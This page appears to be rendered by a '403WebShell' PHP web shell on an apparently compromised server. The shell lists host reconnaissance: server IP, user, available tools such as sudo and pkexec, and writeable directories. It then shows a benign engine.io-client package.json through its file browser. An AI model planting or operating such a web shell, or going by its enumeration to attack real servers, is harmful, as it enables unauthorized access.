Uname:Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64

Base Dir : /var/www/html

User : gavin


403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.217.137
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/gavin/workspace/readjs/node_modules/engine.io-client/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gavin/workspace/readjs/node_modules/engine.io-client/package.json
{
  "_args": [
    [
      {
        "raw": "engine.io-client@1.7.0",
        "scope": null,
        "escapedName": "engine.io-client",
        "name": "engine.io-client",
        "rawSpec": "1.7.0",
        "spec": "1.7.0",
        "type": "version"
      },
      "/home/gavin/workspace/meanjs/node_modules/socket.io-client"
    ]
  ],
  "_from": "engine.io-client@1.7.0",
  "_id": "engine.io-client@1.7.0",
  "_inCache": true,
  "_location": "/engine.io-client",
  "_nodeVersion": "4.4.7",
  "_npmOperationalInternal": {
    "host": "packages-16-east.internal.npmjs.com",
    "tmp": "tmp/engine.io-client-1.7.0.tgz_1475656458179_0.176990871084854"
  },
  "_npmUser": {
    "name": "darrachequesne",
    "email": "damien.arrachequesne@gmail.com"
  },
  "_npmVersion": "2.15.8",
  "_phantomChildren": {},
  "_requested": {
    "raw": "engine.io-client@1.7.0",
    "scope": null,
    "escapedName": "engine.io-client",
    "name": "engine.io-client",
    "rawSpec": "1.7.0",
    "spec": "1.7.0",
    "type": "version"
  },
  "_requiredBy": [
    "/socket.io-client"
  ],
  "_resolved": "https://registry.npmjs.org/engine.io-client/-/engine.io-client-1.7.0.tgz",
  "_shasum": "0bb81d3563ab7afb668f1e1b400c9403b03006ee",
  "_shrinkwrap": null,
  "_spec": "engine.io-client@1.7.0",
  "_where": "/home/gavin/workspace/meanjs/node_modules/socket.io-client",
  "browser": {
    "ws": false,
    "xmlhttprequest-ssl": "./lib/xmlhttprequest.js"
  },
  "bugs": {
    "url": "https://github.com/socketio/engine.io-client/issues"
  },
  "contributors": [
    {
      "name": "Guillermo Rauch",
      "email": "rauchg@gmail.com"
    },
    {
      "name": "Vladimir Dronnikov",
      "email": "dronnikov@gmail.com"
    },
    {
      "name": "Christoph Dorn",
      "url": "https://github.com/cadorn"
    },
    {
      "name": "Mark Mokryn",
      "email": "mokesmokes@gmail.com"
    }
  ],
  "dependencies": {
    "component-emitter": "1.1.2",
    "component-inherit": "0.0.3",
    "debug": "2.2.0",
    "engine.io-parser": "1.3.0",
    "has-cors": "1.1.0",
    "indexof": "0.0.1",
    "parsejson": "0.0.1",
    "parseqs": "0.0.2",
    "parseuri": "0.0.4",
    "ws": "1.1.1",
    "xmlhttprequest-ssl": "1.5.1",
    "yeast": "0.1.2"
  },
  "description": "Client for the realtime Engine",
  "devDependencies": {
    "babel-core": "6.4.5",
    "babel-eslint": "4.1.7",
    "babel-loader": "6.2.1",
    "babel-preset-es2015": "6.3.13",
    "blob": "0.0.4",
    "concat-stream": "1.4.6",
    "del": "2.2.0",
    "derequire": "1.2.0",
    "engine.io": "1.7.0",
    "eslint-config-standard": "4.4.0",
    "eslint-plugin-standard": "1.3.1",
    "expect.js": "0.2.0",
    "express": "3.4.8",
    "gulp": "3.9.0",
    "gulp-eslint": "1.1.1",
    "gulp-file": "0.2.0",
    "gulp-istanbul": "0.10.3",
    "gulp-mocha": "2.2.0",
    "gulp-task-listing": "1.0.1",
    "istanbul": "0.2.3",
    "mocha": "1.16.2",
    "webpack": "1.12.12",
    "webpack-stream": "3.1.0",
    "zuul": "3.11.0",
    "zuul-builder-webpack": "1.1.0",
    "zuul-ngrok": "4.0.0"
  },
  "directories": {},
  "dist": {
    "shasum": "0bb81d3563ab7afb668f1e1b400c9403b03006ee",
    "tarball": "https://registry.npmjs.org/engine.io-client/-/engine.io-client-1.7.0.tgz"
  },
  "files": [
    "index.js",
    "lib/",
    "engine.io.js"
  ],
  "gitHead": "d75d61c17c532cef0b8464d1e384ef951c795486",
  "homepage": "https://github.com/socketio/engine.io-client",
  "license": "MIT",
  "maintainers": [
    {
      "name": "darrachequesne",
      "email": "damien.arrachequesne@gmail.com"
    },
    {
      "name": "rauchg",
      "email": "rauchg@gmail.com"
    }
  ],
  "name": "engine.io-client",
  "optionalDependencies": {},
  "readme": "ERROR: No README data found!",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/socketio/engine.io-client.git"
  },
  "scripts": {
    "test": "gulp test"
  },
  "version": "1.7.0"
}

Youez - 2016 - github.com/yon3zu
LinuXploit